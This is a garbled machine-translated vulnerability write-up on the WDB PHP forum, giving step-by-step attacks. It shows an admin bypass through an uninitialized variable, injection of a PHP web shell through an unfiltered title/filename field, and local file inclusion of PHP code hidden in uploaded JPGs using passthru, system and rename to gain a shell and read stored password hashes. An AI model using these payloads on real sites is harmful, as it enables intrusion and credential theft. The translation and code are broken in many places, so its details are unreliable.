WDB Forum has a number of serious vulnerabilities

===============================================
Only this article to my friend bytes,
and wish him and his girlfriend Lulu can really love each other for a lifetime
===============================================

Objective:
When I talk about Web security with a lot of network administrators, a lot of people tell me that Web security is the SQL injection, "not just embed your SQL statement behind a variable, I will too," This is what I hear most about web security, web security is just SQL Injection, of course not! SQL injection is just the tip of the iceberg. Think of the injection is the web security of all the people, open your eyes, see me with the actual action to give you a loud slap!

Describe:
Recently read the WDB forum, this forum is very good-looking, the style is gorgeous and is similar with the LB5, but the security is not to be flattering, if I say that the average 5 files have a loophole, that is not exaggerated, although the author seems to have deliberately made some precautions, but the filtration is not very strict. Causes malicious users or atypical malicious users to write their own code, and then execute their own statements to control the entire system.

One, topsys.php global variable uninitialized causes control of the entire forum

1. Vulnerability Analysis

Topsys.php is the administrator to centralize the management of the Forum's total top posts file, this file can be used to the forum posts to achieve the total top, empty, delete and other operations, is such a small file, because the programmer for the individual variables of which not initialized, but brought to control the entire forum, Even the entire control system is compromised.
Let's take a look at how to circumvent the restrictions first, part of the code is as follows:
=========codz begin===========
$login _status==1 && ($username = = $admin _name | | ($manager && In_array ($username, $manager))) {$announceadmin = 1;}
I//----Let the increased administrator have the right to manage! ----------
if (file_exists ("datafile/admin_user.php")) {
Include ("datafile/admin_user.php");
if ($admin _user && in_array ($username, $admin _user)) {
$announceadmin = 1;
19}
20}
//----Let the additional administrator have the right to manage! ----------
$musia = 0;
if ($announceadmin ==1) $musia = 1;
=========codz endz============

We can see from the 13th line of inspection, he this code is to determine whether there is administrator rights, if there is a set $announceadmin variable for 1, good, the back of the administrator did not forget to initialize the $musia, and then check the $ Announceadmin variable is not 1, if 1, then set the $musia variable to be true. Here we go, look behind.
Let's look at a piece of code:

=========codz begin===========
if ($job = = "Write") {
151 if ($announceadmin!=1) {require ("header.php");
152 echo "Sorry, not landed or the identity is incorrect, please <a href= ' javascript:history.back (1); ' > Return check </a> ";
153 require ("footer.php");
154 exit;
Back to the top operation ...
=========codz endz============

How does a program verify an administrator's identity? Programmers rely on a value to judge. He checks if the announceadmin variable is 1, if not 1, the error is incorrect (not an administrator). Well, look back and see, just that seemingly rigorous verification, what do you think of? As you may have noticed, the value that is used to check for administrator privileges is not initialized, so if we directly construct a statement to commit $announceadmin=1. We can use Administrator privileges to publish, delete the top of the post. We'll try it, submit it.
Http://bbs.target.com/topsys.php?announceadmin=1
We can already see what is different from what just now, the administrator of the management module, we find a post system top, submit URL as follows:
Http://bbs.target.com/topsys.php?announcea...tent=hello,this is Jambalaya &title=wdbread.php?forumid=1& Filename=f_27, we here put the first Forum 27th Post, titled "Hello,this is Jambalaya" the post system top. Return to see, Haha, we succeeded. Here we use the same method to delete, empty the total system top of the post, here again to analyze a little waste of time, we see it. After a while, remember, how can we control the entire site? Hoho~~ the real attack is here ... Come with me, ~~~~~.

Above these nothing, but is to be the administrator of the total system top, empty and delete posts, nothing else can do, but we have successfully bypassed the administrator permissions of the verification, bypassing after we are different, do not believe? Oh, wait and ...
Let's look at the following code:

=========codz begin===========
165 if (file_exists ("datafile/topsys.php")) $msg =file ("datafile/topsys.php");
166 Else $msg [0]=];
167
$content =stripslashes (Safe_convert ($content));
169 $title =stripslashes (Safe_convert ($title));
170 $title = "". $title;
171 if ($filename) $title = $title. " &filename= ". $filename;//for wdbread.php
172 $new = "$user | $title | $timestamp | $content | $member \ n";
173
174 $oldcount =count ($msg);
175 if ($oldcount > $msgg _max) {
176 for ($i = $msgg _max; $i < $oldcount; $i + +) unset ($msg);
177}
178
179 $old =implode ("", $msg);
180 WriteToFile ("datafile/topsys.php", $new. $old);
=========codz endz============

These are the things we can see after we get admin privileges, let's see, he first checks if there is a datafile/topsys.php, this file is used to record the top of the posts. All right, look what he's written. WriteToFile ("datafile/topsys.php", $new. $old) From this we can see that he will $new. $old write to topsys.php, $new= "$user | $title | $timestamp |$ Content| $member \ n "where $user and $timestamp are fixed, $title and $content seem to be available, but that Safe_convert function looks a little scary. But for the safety of people, careful, endurance is not to be lacked, otherwise the so-called good luck will not be the initiative to find you. In order not to miss a detail, we still look at this function to see if there is not strict filtering. So go to global.php and flip out this function:
=========codz begin===========
837 function Safe_convert ($d) {
838 $d = str_replace ("T", "", $d);
839 $d = Str_replace ("<", "<", $d);
840 $d = Str_replace (">", ">", $d);
841 $d = Str_replace ("\ R", "<br>", $d);
842 $d = Str_replace ("\ n", "", $d);
843 $d = str_replace ("|", "│", $d);
844 $d = Str_replace ("", "", $d);
845 return $d;
846}
=========codz endz============

After reading, a cold sweat, filtered very strict well, a few important characters are basically destroyed by him. It seems impossible to find a way out of the filter here. Go back to look at several other variables, the rest is a $member, the context of a glance. Well, we can control this. We use this value to write our own code to the file.
Feed! Wait a minute! Wait a minute! Actually see here can start to write attack method, but we stopped. Take a closer look at our code, and my analysis process, in fact, there is a point we have overlooked, have you noticed it? No? Take a look again.
Assuming the $member variables are filtered, what else can we do? Take a closer look, in fact that $title variable is not really filtered, where programmers make a serious logical mistake. He was right to filter the $title in the first place, but he was $title after filtering, which is wrong, to see this sentence: "if ($filename) $title = $title." &filename= ". $filename". After he filtered the title strictly, he added the new value to the title variable, and the new value was not filtered. So we can write our code completely with this new value. It was like giving a solid shield to a defender, digging a big hole in the middle of the shield, and saying to the archer, "Well, you can put your arrows on."
From here you can see that any detail of the attention will let your defense fall apart.

2. Attack method
The analysis is finished, "gentleman hands Do not mouth", come, come, get started ~ ~ ~ ~ ~
Now that we can write code into it, what do we write? After 0.001 seconds of thinking, I decided to write a shell into it. We're going to write everything in one lump. Register a user first:
Username:jambalaya
password:itaq.org
Then send a post, the title is "I Test ha", the content is "I am jambalaya, I come from www.itaq.org, we have time to play ah". Haha, submit the following URL:
Http://bbs.target.com/topsys.php?announcea #036; jam);? >
Then direct access to Http://bbs.target.com/topsys.php?jam=dir, see, How? A shell is made up ~ ~ ~ ~
Dir take a look inside the directory, see USER_JKLJKL is to save the user's directory, submit URL:
' target= ' _blank ' >http://bbs.target.com/user_jkljkl/username,?.... No  rabbit descurainiae blind? P
But this is too easy to find, you can first of the other side of the total system to unload, and then the top up, by the way to write a shell into the inside
What does the title variable do without filtering the whole thing? Everyone to try, after all, understand and understand is the same thing, understand and application is not the same thing, in IT Security forum we have a mantra, is a friend SystEm32 brought, I like, here to everyone: "If you have not practiced, then sorry, you do not have the qualifications to speak!" "


Second, the style.php file does not make any filtration

Let's look at the style.php file, where the variable is not filtered, causing a malicious attacker to execute his or her own malicious code and then control the entire Web site.
Test environment: iis5.0+windows2000

1. Specific loopholes

Describe:
Let's take a look at the style.php code:
=========codz begin===========
?
if (empty ($skin)) $skin = Crystal Classics;
if (file_exists ("datafile/style/". $skin)) include ("datafile/style/". $skin);
else include ("datafile/style/Crystal Classic");
=========codz ends=============
The original intention of the code itself is to set the style of the forum, if skin this variable is not empty, then set skin. If the skin file exists under datafile/style/, include this file. We notice that the skin in the code does not have any checks, which means we can do anything, or use the ". /","./"to jump to any directory or include any files we specify.

So what do we do now? We know that include can be used to explain the execution of PHP file code, even if it is saved as a picture, then the back is much simpler, the first to upload a picture, wdb version of different methods of uploading different, some Chinese version can upload avatar, and some can only upload attachments, I use this crystal forum can only upload attachments, but also to send a certain amount of posts can be. After the crazy post, found that the attachment can finally upload. Upload an attachment, see the Forum save it as Upload/forum1_f_23_978374564.jpg, now may have friends want to write a php trojan in jpg, and then use include to explain the implementation. Hehe, This is not going to work. Include does explain the code in JPG, but if you do not have to accept the variable from the Get transfer after the question mark.

We can simply make a probe to find the directory where the user is saved, and write <?passthru ("dir") directly in the JPG file. In the URL directly request Yun_qi_img/forum1_f_23_978374564.jpg, and then rely on the return value, get absolute path, such as I get the absolute path is F:\myhome\wdb\datafile, Incidentally also got all the files inside, and then upload a picture, which is written to <?passthru ("dir f:\\myhome\\wdb"), again in the URL request yun_qi_img/forum1_f_23_978374564. JPG, the return is the directory and file in F:\myhome\wdb, from which to find the user directory, I found is user_jkljkl, in the URL to submit the request Http://bbs.target.com/myhome/wdb/user_ Jkljkl/jambalaya, we can see the Jambalaya's password directly, get the following:
jambalaya|eed8cdc400dfd4ec85dff70a170066b7| |jam@itaq.org| |1083116258| | | | | |1084002908|2| |none|998.4|
1084150077|1084150372| | | | | 1068|jam 2004-05-08 15:55|wdbread.php?forumid=1&filename=f_13| | | 1| | | 192.168.0.13
Jambalaya's code is EED8CDC400DFD4EC85DFF70A170066B7.
Let me get a shell and write to <?system ($a) in another file. ", save into a jpg file upload, the path is upload/forum1_f_24_978374654.jpg, upload a file content is <?rename" f:\\myhome\\wdb\\upload\\forum1_f_24 _978374654.jpg "," jam.php "?> picture, saved as upload/forum1_f_25_978374773.jpg, called directly in the URL yun_qi_img/forum1_f_25_ 978374773.jpg, the purpose is to let it execute our instructions directly to change the suffix name to PHP, so that the successful invocation of our statement gets a shell.

Third, the closure:
Here the article is finished, ready to do the finishing work, or the old saying: do not want everyone to attack others.
Here must emphasize is the existence of the forum loophole, harm not only the forum itself, but the whole system security!
The author has found these loopholes earlier, just at the beginning of the internal version of itaq.org and everyone exchanges, and did not intend to announce. Before long, met a call Lovehacker predecessors, he told me only constant communication can continue to improve, those Shing, research things after not willing to share with others is unable to improve. He took his experience of discovering server vulnerabilities selflessly and shared it. His shared spirit embarrassed me and thanked Lovehacker for his teachings.
Hasty writing, limited technology, if there are any errors in the text, but also hope that the master to www.itaq.org to correct the face, I appreciate.